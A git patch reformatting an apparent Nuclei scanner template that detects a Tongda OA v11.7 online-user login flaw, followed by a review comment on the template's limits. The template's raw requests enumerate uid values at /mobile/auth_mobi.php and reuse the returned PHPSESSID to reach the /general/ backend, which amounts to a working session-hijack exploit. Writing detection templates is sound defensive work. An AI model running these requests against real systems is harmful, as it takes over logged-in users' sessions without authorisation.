From 8f46d8f4b85e3495a96e8a830487f213356ba15a Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 18 Jul 2023 13:39:44 +0530
Subject: [PATCH] lint fix and update format
---
.../tongda/tongda-online-user-login.yaml | 29 ++++++++-----------
1 file changed, 12 insertions(+), 17 deletions(-)
diff --git a/http/vulnerabilities/tongda/tongda-online-user-login.yaml b/http/vulnerabilities/tongda/tongda-online-user-login.yaml
index 2d35e01602..6a73fe0c99 100644
--- a/http/vulnerabilities/tongda/tongda-online-user-login.yaml
+++ b/http/vulnerabilities/tongda/tongda-online-user-login.yaml
@@ -7,36 +7,31 @@ info: description: | Tongda OA is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., LTD v11.7 has the interface query online user function, when the user is online, it will return PHPSESSION so that it can log in to the background system. reference: - - https://s1xhcl.github.io/2021/03/13/%E9%80%9A%E8%BE%BEOA-v11-7-%E5%9C%A8%E7%BA%BF%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E/ + - https://s1xhcl.github.io/2021/03/13/%E9%80%9A%E8%BE%BEOA-v11-7-%E5%9C%A8%E7%BA%BF%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E/ metadata: zoomeye-query: app:"通达OA" tags: tongda,bypass http: - raw: - - | - GET /mobile/auth_mobi.php?isAvatar=1&uid={{uid}}&P_VER=0 HTTP/1.1 - Host: {{Hostname}} + - | + GET /mobile/auth_mobi.php?isAvatar=1&uid={{uid}}&P_VER=0 HTTP/1.1 + Host: {{Hostname}} - - |- - GET /general/ HTTP/1.1 - Host: {{Hostname}} + - |- + GET /general/ HTTP/1.1 + Host: {{Hostname}} + payloads: + uid: [1,2,3,4,5,6,7,8,9,10] + cookie-reuse: true - req-condition: true stop-at-first-match: true - matchers-condition: and matchers: - type: dsl dsl: - - "status_code_1 == 200" - - "status_code_2 == 200" + - "status_code_1 == 200 && status_code_2 == 200" - "len(body_1) == 0" + - "contains(body_2,'uid:') && contains(body_2,'loginUser')" - "contains(header_1,'PHPSESSID=')" - - "contains(body_2,'uid:')" - - "contains(body_2,'loginUser')" condition: and - - payloads: - product: - uid: [1,2,3,4,5,6,7,8,9,10] \ No newline at end of file
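Review bot: The `payloads` block added under `http` probes only `uid` 1 to 10, and per the description the endpoint returns a session only while that user is online, so a non-match does not show the host is unaffected; nothing in the visible lines documents that limit. I would add a comment above `payloads:` such as `# Only uids 1-10 are probed and the user must be online at scan time; no match is not proof of a patched host.` Because `cookie-reuse: true` carries the returned PHPSESSID into the second request, a match means the scanner held a live session belonging to a real user, so proxy logs and traffic captures from the run should be handled as credentials. The `info` block starts above the hunk, so whether severity and remediation are recorded there cannot be checked from here.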